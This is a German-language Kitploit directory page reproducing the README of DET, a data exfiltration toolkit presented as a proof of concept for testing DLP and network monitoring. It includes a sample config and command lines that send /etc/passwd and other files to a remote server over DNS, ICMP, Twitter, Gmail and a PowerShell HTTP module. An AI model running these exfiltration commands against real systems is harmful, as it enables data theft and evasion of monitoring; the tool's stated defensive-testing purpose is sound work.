Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
DET — (erweiterbar) Data Exfiltration Toolkit (DET) | Kitploit
Tools/GitHubGitHub/sensepost/det
Verschlüsselungs-/EntschlüsselungstoolsDatenexfiltrationNetzwerksicherheitPenetrationstestsRed TeamingDNS-Analyse
GitHubsensepost/det

DET

(erweiterbar) Data Exfiltration Toolkit (DET)

Repository anzeigen
821190vor 8 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

DET (erweiterbares) Data Exfiltration Toolkit

DET (wird AS IS bereitgestellt) ist ein Proof of Concept zur Durchführung von Data Exfiltration unter Verwendung von entweder einem oder mehreren Kanälen gleichzeitig.

Dies ist ein Proof of Concept, das darauf abzielt, mögliche DLP-Fehler zu identifizieren. Dies sollte niemals verwendet werden, um sensible/aktuelle Daten zu exfiltrieren (etwa bei einer Bewertung).

Die Idee war, ein generisches Toolkit zu erstellen, um jede Art von Protokoll/Dienst einzustecken, um die Konfiguration implementierter Netzwerküberwachungs- und Data Leakage Prevention (DLP)-Lösungen gegen verschiedene Datenexfiltrationstechniken zu testen.

Das primäre Repository wurde nun hierher verschoben.

Folien

DET wurde auf der BSides Ljubljana am 9. März 2016 vorgestellt und die Folien werden hier verfügbar sein. Folien sind hier verfügbar.

Beispielverwendung (ICMP-Plugin)

Serverseite:

asciicast

Clientseite:

asciicast

Verwendung bei Kombination zweier Kanäle (Gmail/Twitter)

Serverseite:

asciicast

Clientseite:

asciicast

Installation

Repository klonen:

root@kitploit:~
git clone https://github.com/sensepost/DET.git

Dann:

root@kitploit:~
pip install -r requirements.txt --user

Konfiguration

Um DET zu verwenden, müssen Sie es konfigurieren und Ihre eigenen Einstellungen hinzufügen (z.B. SMTP/IMAP, AES256-Verschlüsselungspassphrase usw.). Eine Beispielkonfigurationsdatei wurde bereitgestellt und heißt: config-sample.json

root@kitploit:~
{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080,
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "[email protected]",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "udp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}

Verwendung

Hilfe zur Verwendung

root@kitploit:~
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

Serverseite:

Um jedes Plugin zu laden:

root@kitploit:~
python det.py -L -c ./config.json

Um nur die Twitter- und Gmail-Module zu laden:

root@kitploit:~
python det.py -L -c ./config.json -p twitter,gmail

Um jedes Plugin zu laden und DNS auszuschließen:

root@kitploit:~
python det.py -L -c ./config.json -e dns

Clientseite:

Um jedes Plugin zu laden:

root@kitploit:~
python det.py -c ./config.json -f /etc/passwd

Um nur die Twitter- und Gmail-Module zu laden:

root@kitploit:~
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

Um jedes Plugin zu laden und DNS auszuschließen:

root@kitploit:~
python det.py -c ./config.json -e dns -f /etc/passwd

Und in PowerShell (HTTP-Modul):

root@kitploit:~
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

Module

Bisher unterstützt DET mehrere Protokolle, die hier aufgelistet sind:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (z.B. Gmail)
  • Raw TCP
  • PowerShell-Implementierung (HTTP, DNS, ICMP, SMTP (verwendet mit Gmail))

Und andere "Dienste":

  • Google Docs (Unauthentifiziert)
  • Twitter (Direct Messages)

Experimentelle Module

Bisher bin ich damit beschäftigt, neue Module zu implementieren, die fast versandbereit sind, darunter:

  • Skype (95% fertig)
  • Tor (80% fertig)
  • Github (30/40% fertig)

Roadmap

  • Ordnungsgemäße Verschlüsselung hinzugefügt (z.B. AES-256) Danke an ryanohoro
  • Kompression (extrem wichtig!) Danke an chokepoint
  • Ordnungsgemäße Datenverschleierung und Integration von Cloakify Toolset
  • FTP, FlickR LSB Steganography und Youtube-Module

Referenzen

Einige ziemlich coole Referenzen/Credits an Leute, von deren Projekten ich inspiriert wurde:

  • https://github.com/nullbind/Powershellery/ von Nullbind.
  • https://github.com/ytisf/PyExfil, wirklich großartig.
  • https://github.com/m57/dnsteal von m57.
  • https://github.com/3nc0d3r/NaishoDeNusumu von 3nc0d3r.
  • https://github.com/glennzw/exphil von Glenn Wilkinson.
  • WebExfile von Saif El-Sherei

Kontakt/Mitwirken

Sie können mich auf Twitter @PaulWebSec erreichen. Fühlen Sie sich frei, beizutragen, zu klonen, zu forken, Ihre PRs einzureichen usw.

Lizenz

DET ist unter einer MIT-Lizenz lizenziert. Berechtigungen über den Umfang dieser Lizenz hinaus können unter [email protected] verfügbar sein.

Tool herunterladen